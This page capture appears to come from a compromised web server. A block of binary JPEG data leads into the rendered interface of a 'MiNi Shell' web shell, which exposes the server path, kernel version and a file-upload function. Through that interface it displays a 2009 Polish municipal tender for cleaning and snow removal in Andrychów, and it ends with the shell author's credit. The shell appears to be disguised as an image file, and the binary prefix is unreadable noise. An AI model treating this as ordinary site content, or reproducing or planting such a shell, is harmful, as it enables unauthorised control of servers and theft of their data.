JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090317/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090317/64626-N-2009.html

<p class="kh_header"><b>Andrychów: Utrzymanie czystości i porządku w  budynkach oraz sprzątanie i odśnieżanie terenów administrowanych przez Zespół Obsługi Mienia Komunalnego w Andrychowie</b><br>
<b>Numer ogłoszenia: 64626 - 2009; data zamieszczenia: 17.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Obsługi Mienia Komunalnego , ul. Metalowców 6, 34-120 Andrychów, woj. małopolskie, tel. 033 8753168, faks 033 8752391.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie czystości i porządku w  budynkach oraz sprzątanie i odśnieżanie terenów administrowanych przez Zespół Obsługi Mienia Komunalnego w Andrychowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
1. Sprzątanie pomieszczeń ogólnodostępnych w  budynku Inkubatora Przedsiębiorczości ul. Starowiejska 22 a -  polegające na: 
1/ utrzymanie na bieżąco w należytym stanie , porządku i czystości pomieszczeń 
wspólnego użytku /korytarzy, klatek schodowych, pomieszczeń sanitarnych/ - 
powierzchnia około 500 m2,
2/ mycie okien drzwi wewnętrznych w pomieszczeniach wspólnego użytku  2 razy  w roku /maj, październik/ - powierzchnia szyb około 130 m2,
3/ mycie drzwi wejściowych według potrzeb, powierzchnia szyb około 12 m2,               
4/ utrzymywanie na bieżąco czystości w bezpośrednim otoczeniu budynków -  
Sprzątanie terenów przyległych do budynków, w tym terenów zielonych - około    1500 m2, chodników - powierzchnia około 550 m2,
5/ utrzymywanie na bieżąco terenów zielonych wokół budynku /około 1500 m2/ w tym: pielęgnacja żywopłotu , grabienie wiosenne i jesienne /grabienie i zbieranie liści/,
6/ bieżące oczyszczanie  ze śniegu, lodu, błota i innych nieczystości /około 550 m2/: schodów wejściowych, chodników przy budynkach, wjazdów, 
7/ codzienne zamykanie budynku o godz. 22.00, 
8/ roznoszenie korespondencji otrzymanej od Zleceniodawcy, a skierowanej do     najemców lokali za potwierdzeniem , 2 razy w miesiącu , ilość najemców - do 40,
9/ comiesięczne odczytywanie liczników na wodę i energię elektryczną znajdujących się w lokalach najemców - 25 liczników ,  1 raz w miesiącu.
2. Sprzątanie części ogólnodostępnych i terenów przyległych do budynków: ul. Pachla 2, ul. Krakowska 107,  ul. Krakowska 146A,  ul. Floriańska 3A  tj.:
1/ utrzymanie na bieżąco i należytym stanie , porządku i czystości pomieszczeń  
wspólnego użytku, z wyjątkiem podestów, schodów i lamperii na klatkach  schodowych, - powierzchnia około 290m2,
2/ mycie okien na klatkach 2 razy w roku /maj, październik/, - powierzchnia około 20 m2,
3/ mycie drzwi wejściowych wg potrzeb, - powierzchnia około 25 m2 /w tym 8m2  
powierzchni luxfer/,
4/ utrzymywanie na bieżąco czystości w bezpośrednim otoczeniu budynków -  sprzątanie wiat na nieczystości stałe lub miejsc wokół pojemników na śmieci, dojścia do wiat, terenów przyległych do budynków,  powierzchnia  terenów zielonych - około 2000 m2,  powierzchnia  chodników - około 350 m2,
5/ utrzymywanie na bieżąco terenów zielonych /około 2000m2/ wokół budynków w tym: grabienie  wiosenne i jesienne /grabienie i zbieranie liści/,
6/ bieżące oczyszczanie ze śniegu, lodu, błota i innych nieczystości: schodów 
wejściowych, chodników przy budynkach i opasek przy budynkach /około  350m2/.
3. Utrzymywanie chodników /powierzchnia około 1550 m2/, placów i terenów zielonych /o powierzchni około 31.000m2/:
- w rejonie Pawilonu Handlowego ul. Włókniarzy 1,
- wskazanych przez Zleceniodawcę, znajdujących się na terenach gminnych /ul.  
Olszyny, 1 Maja, Włókniarzy, Metalowców, Starowiejska, przylegających bezpośrednio do działek na których znajdują się budynki Wspólnot Mieszkaniowych.
Utrzymanie chodników polega na:
1/ bieżącym utrzymaniu czystości poprzez zamiatanie, zbieranie śmieci i innych 
nieczystości, plewienie przy krawężnikach i między płytkami,
2/ bieżącego oczyszczania  chodników i placów ze śniegu, lodu, błota ,
3/ bieżąca likwidacja gołoledzi na chodnikach i placach.
Utrzymywanie terenów zielonych polega na bieżącym otrzymaniu czystości oraz 
grabieniu wiosennym i jesiennym.
4. Utrzymywanie porządku i czystości w siedzibie Zespołu Obsługi Mienia Komunalnego ul. Metalowców 6 oraz na terenie bezpośrednio przyległym polegające na:
- sprzątaniu pomieszczeń  o powierzchni około140m2 co drugi dzień roboczy,
- mycie okien 2  razy w roku powierzchnia szyb około 26 m2 /maj, październik/,
- zamiatanie wejścia do budynku co drugi dzień roboczy,
- bieżące utrzymywanie czystości  wokół budynku, powierzchnia około 300 m2
- oczyszczanie na bieżąco wejścia do budynku ze śniegu, lodu..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.62.00.00-9, 90.91.12.00-8, 90.91.13.00-9, 77.34.20.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane w niniejszym postępowaniu<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O zamówienie mogą ubiegać się Wykonawcy którzy spełniają warunki udziału 
określone w SIWZ oraz w art.22 ustawy PZP, tj: 
1.1 Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
Warunek zostanie uznany za spełniony gdy Wykonawca przedstawi w ofercie 
aktualny na dzień składania ofert dokument /wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert/ dopuszczający Wykonawcę do 
obrotu prawnego w zakresie objętym zamówieniem /odpis z właściwego rejestru lub 
zaświadczenie o wpisie do ewidencji działalności gospodarczej/, w przypadku gdy 
ofertę składa kilka podmiotów działających wspólnie dotyczy to każdego z nich, 
1.2 Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem 
technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią 
pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego 
i osób zdolnych do wykonania zamówienia;
Warunek zostanie uznany za spełniony, gdy Wykonawca wykaże, że w ciągu  
ostatnich 3 lat tj. 2006 - 2008 wykonał co najmniej jedno podobne zamówienie 
odpowiadające wartością przedmiotowi zamówienia oraz przedstawi w ofercie  
wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi 
dysponuje, Wykonawca powinien wykazać, że dysponuje następującym sprzętem
i urządzeniami:
- samochodem ciężarowym typu lekkiego o ładowności do 3,5 tony lub ciągnikiem
z przyczepą,
- telefonem komórkowym - min. 2 szt
lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia 
potencjału technicznego i osób zdolnych  do wykonania  zamówienia  -  w  przypadku, gdy Wykonawca nie dysponuje potencjałem technicznym i osobami 
zdolnymi do wykonania zamówienia.
1.3 Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
zamówienia.
Warunek zostanie uznany  za  spełniony, gdy Wykonawca posiada polisę, 
a w  przypadku jej  braku inny dokument  potwierdzający, że Wykonawca jest   
ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności  
na kwotę minimum 50 000,00  zł.
1.4 Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art.24 ustawy PZP.
Warunek zostanie uznany za spełniony gdy Wykonawca przedstawi w ofercie 
oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art.22 ust.1 
ustawy Prawo zamówień publicznych /wg. wzoru do SIWZ/ oraz oświadczenie o nie 
podleganiu wykluczeniu z  postępowania na podstawie art. 24 ust. 1 i 2 ustawy z dnia 29 stycznia 2004r Prawo zamówień publicznych /wg. wzoru do SIWZ/.
2. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia /np. w formie konsorcjum/. W takim przypadku Wykonawcy winni upoważnić jednego spośród siebie jako przedstawiciela pozostałych do reprezentowania ich w postępowaniu o udzielenie zamówienia i zawarcia umowy w sprawie zamówienia publicznego a jego upoważnienie musi być udokumentowane pełnomocnictwem podpisanym przez uprawnionych przedstawicieli wszystkich pozostałych wykonawców. Przedmiotowe pełnomocnictwo musi zostać dołączone do oferty w oryginale lub odpisie potwierdzonym notarialnie..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Aktualny na dzień składania ofert dokument /wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert/ dopuszczający Wykonawcę do obrotu prawnego w zakresie objętym zamówieniem /odpis z właściwego rejestru lub 
zaświadczenie o wpisie do ewidencji działalności gospodarczej/.
2. Wykaz wykonanych w okresie ostatnich 3 lat porównywalnych do przedmiotu 
zamówienia usług /minimum jednej/, a jeżeli okres prowadzenia działalności jest 
krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania
i podmiotów zlecających oraz  załączenie dokumentów potwierdzających że usługi te zostały wykonane należycie.
3. Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń jakimi dysponuje lub będzie dysponował Wykonawca.
4. Pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia - w przypadku, gdy Wykonawca nie dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia.
5. Polisę, a w  przypadku jej  braku inny dokument  potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę minimum 50 000,00  zł.
6. Oświadczenie o spełnianiu przez Wykonawcę warunków udziału określonych w art. 22 ust.1 ustawy Prawo zamówień publicznych 
7. Oświadczenie o nie podleganiu Wykonawcy wykluczeniu z postępowania na 
podstawie art. 24 ust.1 i 2 ustawy Prawo zamówień publicznych.
8. W przypadku gdy Wykonawca ma siedzibę lub miejsce zamieszkania za granicą,  w miejsce dokumentów, o których mowa w pkt. 1 zobowiązany jest przedłożyć 
dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce 
zamieszkania,  potwierdzające odpowiednio że nie otwarto jego likwidacji ani nie 
ogłoszono upadłości /wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert/.
9. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się powyższych dokumentów, wykonawca może je zastąpić stosownym dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem 
samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia lub 
kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
10. Oprócz w/w dokumentów i oświadczeń oferta będzie zawierać zaakceptowany Wzór umowy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.um.andrychow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Obsługi  Mienia  Komunalnego 34-120 Andrychów ul. Metalowców 6, pokój nr 5.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.03.2009 godzina 10:00, miejsce: Zespół Obsługi  Mienia  Komunalnego 34-120 Andrychów ul. Metalowców 6, pokój nr 16.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com